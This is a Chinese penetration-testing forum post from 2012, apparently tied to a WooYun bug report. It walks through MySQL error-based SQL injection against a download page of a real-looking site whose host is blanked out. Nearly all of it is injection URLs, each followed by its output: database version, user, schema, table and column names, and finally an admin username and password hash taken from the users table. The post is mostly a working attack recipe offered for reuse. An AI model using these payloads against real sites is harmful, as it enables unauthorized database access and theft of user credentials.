找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php+mysql高级爆错注入经测算有效
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1918|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-016667 Y* W# k/ {; Y4 ?/ l& g3 @$ M

% J/ f( P+ ?# M7 \  U+ u; p" t: M之前想找个测试 没想到这有 可以测试下做个记录而已 ) Q( i- h. y* |! k- {- W2 h

0 Y3 t8 h. w% M0 f3 Chttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003. {+ x' D: {/ a0 A8 g

; C3 v7 [- T% P: S, B* g/data0/htdocs/leqi_new/app/myapp.php- E$ q% x+ s$ L/ f: J
4 y! H- L" {- M3 V7 [; A0 t' s& n
或者' |+ E5 Y9 V& l8 M
7 _4 e! ]6 \$ o& P
/**********version()**********/ 5.1.49-log
4 L7 y+ Y$ ]$ K0 z0 S  B. shttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
- S8 p/ }* r  z" P3 R! B
, }+ c8 m5 f( _0 p/**********user()**********/  ( V  s4 ?$ D% n% n& u8 ?
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0034 |9 m# l; }& m+ g+ D
- t6 B* }  X. _1 p0 H) N
/**********database()**********/  leqi
' B0 s  E7 V# bhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0033 H8 h* k& }: q! U% @9 _$ E
+ l9 R5 J. _( A1 {) W9 N
/**********limit依次递归爆库**********/, ^- `; `3 \, a$ F* x$ }
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
, {' |; V+ v, z: P3 Z: I9 H( o9 Cinformation_schema
+ }$ \1 N: c  p0 G4 Ahttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
, O2 B/ T$ F* jleqi
  h" Z; i, D' Y9 e0 G, o3 a9 qhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003" j* Z; P4 J4 F) f8 l- }5 ~
test* J4 V3 B8 v+ m& C: P) a/ d; l
% g6 Z1 e  K3 u* {/ c8 W
/**********limit依次递归爆表名**********/
5 F1 {; v$ |# c+ b8 Shttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0030 a+ z* Z; p3 f2 ^" v, Y, ^1 [- R
users9 e5 N% q% n+ |- H! p+ K3 D
+ p% w8 {! N# y- T/ f0 y
/**********limit依次递归爆字段名**********/
; w) p. G1 z4 k0 whttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0033 {% b* h5 Z. t3 D
user_id,username,nickname,passwd,group_id
$ i5 }: L- y" T$ U4 U+ Ehttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
1 J2 P8 x. e. f; f/wapc/5000_0005_003
4 M. p. j" m/ j- P11 21& z* c/ a4 D! q- D. f7 R
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
" V3 u% f  ?4 g8 Q5 X/wapc/5000_0005_0034 Q( f3 o" C, s, P0 K; R+ O# p
11 341 351 361
* y, Z: e* H. l2 y$ h1 a/**********爆数据**********/
0 |2 s2 H9 I! o$ q' xhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23+ @0 A  o7 A8 _9 d- S+ N4 q
admin- u: i3 v( z2 J- {
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23! Q/ H4 g+ h7 ~9 f
6a8b4574ca231eb8bd52764d4978ffcd! I2 M1 D( _1 H7 R. E% X3 i4 ], U

3 w" _0 i$ @7 f0 A2 x; j  Q
1 {& s; P4 T7 B
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表